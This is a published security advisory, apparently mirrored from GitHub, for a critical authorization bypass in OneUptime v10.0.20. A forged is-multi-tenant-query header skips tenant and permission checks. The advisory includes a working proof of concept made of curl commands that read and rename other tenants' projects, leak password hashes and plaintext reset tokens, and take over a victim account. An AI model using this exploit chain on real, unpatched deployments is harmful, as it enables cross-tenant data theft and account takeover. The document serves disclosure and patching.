GHSA-R5V6-2599-9G3M

Vulnerability from github – Published: 2026-03-10 01:09 – Updated: 2026-03-10 18:45
VLAI?
Summary
OneUptime has authorization bypass via client‑controlled is-multi-tenant-query header that leads to cross‑tenant data exposure and account takeover
Details

Summary

A low‑privileged user can bypass authorization and tenant isolation in OneUptime v10.0.20 by sending a forged is-multi-tenant-query header together with a controlled projectid header.

Because the server trusts this client-supplied header, internal permission checks in BasePermission are skipped and tenant scoping is disabled.

This allows attackers to:

  1. Access project data belonging to other tenants
  2. Read sensitive User fields via nested relations
  3. Leak plaintext resetPasswordToken
  4. Reset the victim’s password and fully take over the account

This results in cross‑tenant data exposure and full account takeover.

Details

Root cause

The API trusts a client‑controlled header to determine whether a request should bypass authorization checks.

CommonAPI.ts

if (req.headers["is-multi-tenant-query"]) {
  props.isMultiTenantRequest = true;
}

BasePermission.ts

if (!props.isMultiTenantRequest) {
  TablePermission.checkTableLevelPermissions(...)
  QueryPermission.checkQueryPermission(...)
  SelectPermission.checkSelectPermission(...)
}

When the attacker sends:

is-multi-tenant-query: true

the system skips all authorization checks including:

  • Table permission validation
  • Query permission validation
  • Select permission validation
  • Tenant isolation enforcement

Additionally, tenant scoping is disabled in TenantPermission

Sensitive user data exposure

Projects marked with:

@MultiTenentQueryAllowed(true)

allow cross-tenant queries when the header is present.

The Project model contains a relation:

createdByUser

Because select permission checks are skipped, attackers can retrieve sensitive fields from the User model including:

password
resetPasswordToken
webauthnChallenge

Reset token stored in plaintext

In the password reset flow:

Authentication.ts

resetPasswordToken: token

The reset token is stored in plaintext in the database.

During password reset:

/api/identity/reset-password

the server validates the provided token directly.

If an attacker leaks this token through the authorization bypass, they can immediately reset the victim’s password.

Exploitation chain

  1. Attacker bypasses tenant isolation using is-multi-tenant-query
  2. Attacker reads victim project
  3. Attacker selects createdByUser.resetPasswordToken
  4. Attacker triggers forgot-password for victim
  5. Attacker retrieves the fresh token via the same query
  6. Attacker calls /api/identity/reset-password
  7. Attacker sets a new password
  8. Attacker logs in as victim

This results in full account takeover.

PoC

Setup: - Local OneUptime v10.0.20 instance - Two normal accounts: - Attacker account owns Project A (7cb77c45-c2e0-42b5-8a28-57aa0dec6e82) - Victim account owns Project B (88ced36b-4c0a-4c12-bdf1-497d60b10b23) with email victim@example.com

Chain 1: Direct Project Isolation Bypass

1. Read isolation bypass

curl -X POST http://localhost/api/project/get-list \
  -H "authorization: Bearer <attacker_token>" \
  -H "projectid: 7cb77c45-c2e0-42b5-8a28-57aa0dec6e82" \
  -H "is-multi-tenant-query: true" \
  -H "content-type: application/json" \
  -d '{
        "query": {},
        "select": {
            "_id": true,
            "name": true,
            "createdOwnerEmail": true
        }
      }'

Result: Returns both the attacker's and victim's projects:

{
  "data": [
    {
      "_id": "88ced36b-4c0a-4c12-bdf1-497d60b10b23",
      "name": "Victim Project",
      "createdOwnerEmail": { "value": "victim@example.com" }
    },
    {
      "_id": "7cb77c45-c2e0-42b5-8a28-57aa0dec6e82",
      "name": "Attacker Project",
      "createdOwnerEmail": { "value": "attacker@example.com" }
    }
  ],
  "count": 2
}
  1. Write isolation bypass

Victim project name is initially: Victim Project ORIGINAL

curl -X POST http://localhost/api/project/88ced36b-4c0a-4c12-bdf1-497d60b10b23/update-item \
  -H "authorization: Bearer <attacker_token>" \
  -H "projectid: 7cb77c45-c2e0-42b5-8a28-57aa0dec6e82" \
  -H "is-multi-tenant-query: true" \
  -H "content-type: application/json" \
  -d '{"name":"Victim Project EXPLOIT"}'

Result: Victim project name is updated to "Victim Project EXPLOIT" despite the attacker not being a member of the victim project.

Chain 2: Account Takeover via Credential Leakage

  1. Trigger password reset for victim
curl -X POST http://localhost/api/identity/forgot-password \
  -H "content-type: application/json" \
  -d "{\"email\":\"victim@example.com\"}"
  1. Leak victim password hash and reset token via tenant bypass
curl -X POST http://localhost/api/project/get-list \
  -H "authorization: Bearer <attacker_token>" \
  -H "projectid: 7cb77c45-c2e0-42b5-8a28-57aa0dec6e82" \
  -H "is-multi-tenant-query: true" \
  -H "content-type: application/json" \
  -d '{
        "query": {"_id": "88ced36b-4c0a-4c12-bdf1-497d60b10b23"},
        "select": {
          "_id": true,
          "createdByUser": {
            "email": true,
            "password": true,
            "resetPasswordToken": true
          }
        }
      }'

Result: Sensitive user data is exposed:

{
  "data": [{
    "_id": "88ced36b-4c0a-4c12-bdf1-497d60b10b23",
    "createdByUser": {
      "email": {"value": "victim@example.com"},
      "password": {"value": "faef08e8f2b9e9dfa09c15dfaf043b8aad7761d9712c7e09417d4da2156e33d9"},
      "resetPasswordToken": "4b75e6d0-1aca-11f1-b2d4-698549b693fb"
    }
  }]
}
  1. Take over victim account using leaked token
# Reset password with leaked token
curl -X POST http://localhost/api/identity/reset-password \
  -H "content-type: application/json" \
  -d '{
    "resetPasswordToken": "4b75e6d0-1aca-11f1-b2d4-698549b693fb",
    "password": "AttackerChosenPassword123!"
  }'

# Login as victim with new password
curl -X POST http://localhost/api/identity/login \
  -H "content-type: application/json" \
  -d '{
    "email": "victim@example.com",
    "password": "AttackerChosenPassword123!"
  }'

Result: Successful login with attacker-chosen password, original password fails - complete account takeover achieved.

Result: Victim project name is updated despite the attacker not being a member of the victim project.

Impact

This vulnerability allows a low‑privileged authenticated user to:

  • bypass tenant isolation
  • access other tenant projects
  • read sensitive user credential fields
  • leak plaintext reset tokens
  • reset victim passwords
  • fully take over victim accounts

Because OneUptime is a multi‑tenant monitoring platform, this allows attackers to compromise any tenant account in the system.

Severity ?
9.9 (Critical)
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
Show details on source website
To clipboard 

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "@oneuptime/common"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "10.0.21"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-30956"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-285",
      "CWE-862"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-03-10T01:09:40Z",
    "nvd_published_at": "2026-03-10T18:18:54Z",
    "severity": "CRITICAL"
  },
  "details": "### Summary\nA low\u2011privileged user can bypass authorization and tenant isolation in OneUptime `v10.0.20` by sending a forged `is-multi-tenant-query` header together with a controlled `projectid` header.\n\nBecause the server trusts this client-supplied header, internal permission checks in `BasePermission` are skipped and tenant scoping is disabled.\n\nThis allows attackers to:\n\n1. Access project data belonging to other tenants\n2. Read sensitive User fields via nested relations\n3. Leak plaintext resetPasswordToken\n4. Reset the victim\u2019s password and fully take over the account\n\nThis results in cross\u2011tenant data exposure and full account takeover.\n\n### Details\n\nRoot cause\n\nThe API trusts a client\u2011controlled header to determine whether a request should bypass authorization checks.\n\nCommonAPI.ts\n```\nif (req.headers[\"is-multi-tenant-query\"]) {\n  props.isMultiTenantRequest = true;\n}\n```\nBasePermission.ts\n```\nif (!props.isMultiTenantRequest) {\n  TablePermission.checkTableLevelPermissions(...)\n  QueryPermission.checkQueryPermission(...)\n  SelectPermission.checkSelectPermission(...)\n}\n```\nWhen the attacker sends:\n```\nis-multi-tenant-query: true\n```\nthe system skips all authorization checks including:\n\n- Table permission validation\n- Query permission validation\n- Select permission validation\n- Tenant isolation enforcement\n\nAdditionally, tenant scoping is disabled in `TenantPermission`\n\nSensitive user data exposure\n\nProjects marked with:\n```\n@MultiTenentQueryAllowed(true)\n```\nallow cross-tenant queries when the header is present.\n\nThe Project model contains a relation:\n```\ncreatedByUser\n```\nBecause select permission checks are skipped, attackers can retrieve sensitive fields from the User model including:\n```\npassword\nresetPasswordToken\nwebauthnChallenge\n```\n\nReset token stored in plaintext\n\nIn the password reset flow:\n\nAuthentication.ts\n```\nresetPasswordToken: token\n```\nThe reset token is stored in plaintext in the database.\n\nDuring password reset:\n```\n/api/identity/reset-password\n```\nthe server validates the provided token directly.\n\nIf an attacker leaks this token through the authorization bypass, they can immediately reset the victim\u2019s password.\n\nExploitation chain\n\n1. Attacker bypasses tenant isolation using is-multi-tenant-query\n2. Attacker reads victim project\n3. Attacker selects createdByUser.resetPasswordToken\n4. Attacker triggers forgot-password for victim\n5. Attacker retrieves the fresh token via the same query\n6. Attacker calls /api/identity/reset-password\n7. Attacker sets a new password\n8. Attacker logs in as victim\n\nThis results in full account takeover.\n\n### PoC\n\n**Setup:**\n- Local OneUptime v10.0.20 instance\n- Two normal accounts:\n  - Attacker account owns Project A (`7cb77c45-c2e0-42b5-8a28-57aa0dec6e82`)\n  - Victim account owns Project B (`88ced36b-4c0a-4c12-bdf1-497d60b10b23`) with email `victim@example.com`\n\n---\n\n#### Chain 1: Direct Project Isolation Bypass\n\n**1. Read isolation bypass**\n\n```bash\ncurl -X POST http://localhost/api/project/get-list \\\n  -H \"authorization: Bearer \u003cattacker_token\u003e\" \\\n  -H \"projectid: 7cb77c45-c2e0-42b5-8a28-57aa0dec6e82\" \\\n  -H \"is-multi-tenant-query: true\" \\\n  -H \"content-type: application/json\" \\\n  -d \u0027{\n        \"query\": {},\n        \"select\": {\n            \"_id\": true,\n            \"name\": true,\n            \"createdOwnerEmail\": true\n        }\n      }\u0027\n```\nResult: Returns both the attacker\u0027s and victim\u0027s projects:\n```json\n{\n  \"data\": [\n    {\n      \"_id\": \"88ced36b-4c0a-4c12-bdf1-497d60b10b23\",\n      \"name\": \"Victim Project\",\n      \"createdOwnerEmail\": { \"value\": \"victim@example.com\" }\n    },\n    {\n      \"_id\": \"7cb77c45-c2e0-42b5-8a28-57aa0dec6e82\",\n      \"name\": \"Attacker Project\",\n      \"createdOwnerEmail\": { \"value\": \"attacker@example.com\" }\n    }\n  ],\n  \"count\": 2\n}\n```\n2. Write isolation bypass\n\nVictim project name is initially: Victim Project ORIGINAL\n```\ncurl -X POST http://localhost/api/project/88ced36b-4c0a-4c12-bdf1-497d60b10b23/update-item \\\n  -H \"authorization: Bearer \u003cattacker_token\u003e\" \\\n  -H \"projectid: 7cb77c45-c2e0-42b5-8a28-57aa0dec6e82\" \\\n  -H \"is-multi-tenant-query: true\" \\\n  -H \"content-type: application/json\" \\\n  -d \u0027{\"name\":\"Victim Project EXPLOIT\"}\u0027\n```\nResult: Victim project name is updated to \"Victim Project EXPLOIT\" despite the attacker not being a member of the victim project.\n\n#### Chain 2: Account Takeover via Credential Leakage\n\n3. Trigger password reset for victim\n```\ncurl -X POST http://localhost/api/identity/forgot-password \\\n  -H \"content-type: application/json\" \\\n  -d \"{\\\"email\\\":\\\"victim@example.com\\\"}\"\n```\n4. Leak victim password hash and reset token via tenant bypass\n```\ncurl -X POST http://localhost/api/project/get-list \\\n  -H \"authorization: Bearer \u003cattacker_token\u003e\" \\\n  -H \"projectid: 7cb77c45-c2e0-42b5-8a28-57aa0dec6e82\" \\\n  -H \"is-multi-tenant-query: true\" \\\n  -H \"content-type: application/json\" \\\n  -d \u0027{\n        \"query\": {\"_id\": \"88ced36b-4c0a-4c12-bdf1-497d60b10b23\"},\n        \"select\": {\n          \"_id\": true,\n          \"createdByUser\": {\n            \"email\": true,\n            \"password\": true,\n            \"resetPasswordToken\": true\n          }\n        }\n      }\u0027\n```\nResult: Sensitive user data is exposed:\n```\n{\n  \"data\": [{\n    \"_id\": \"88ced36b-4c0a-4c12-bdf1-497d60b10b23\",\n    \"createdByUser\": {\n      \"email\": {\"value\": \"victim@example.com\"},\n      \"password\": {\"value\": \"faef08e8f2b9e9dfa09c15dfaf043b8aad7761d9712c7e09417d4da2156e33d9\"},\n      \"resetPasswordToken\": \"4b75e6d0-1aca-11f1-b2d4-698549b693fb\"\n    }\n  }]\n}\n```\n5. Take over victim account using leaked token\n```\n# Reset password with leaked token\ncurl -X POST http://localhost/api/identity/reset-password \\\n  -H \"content-type: application/json\" \\\n  -d \u0027{\n    \"resetPasswordToken\": \"4b75e6d0-1aca-11f1-b2d4-698549b693fb\",\n    \"password\": \"AttackerChosenPassword123!\"\n  }\u0027\n\n# Login as victim with new password\ncurl -X POST http://localhost/api/identity/login \\\n  -H \"content-type: application/json\" \\\n  -d \u0027{\n    \"email\": \"victim@example.com\",\n    \"password\": \"AttackerChosenPassword123!\"\n  }\u0027\n```\nResult: Successful login with attacker-chosen password, original password fails - complete account takeover achieved.\n\n\n\nResult: Victim project name is updated despite the attacker not being a member of the victim project.\n### Impact\nThis vulnerability allows a low\u2011privileged authenticated user to:\n\n- bypass tenant isolation\n- access other tenant projects\n- read sensitive user credential fields\n- leak plaintext reset tokens\n- reset victim passwords\n- fully take over victim accounts\n\nBecause OneUptime is a multi\u2011tenant monitoring platform, this allows attackers to compromise any tenant account in the system.",
  "id": "GHSA-r5v6-2599-9g3m",
  "modified": "2026-03-10T18:45:02Z",
  "published": "2026-03-10T01:09:40Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/OneUptime/oneuptime/security/advisories/GHSA-r5v6-2599-9g3m"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-30956"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/OneUptime/oneuptime"
    },
    {
      "type": "WEB",
      "url": "https://github.com/OneUptime/oneuptime/releases/tag/10.0.21"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "OneUptime has authorization bypass via client\u2011controlled is-multi-tenant-query header that leads to cross\u2011tenant data exposure and account takeover"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.




Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.



Detection rules are retrieved from Rulezet.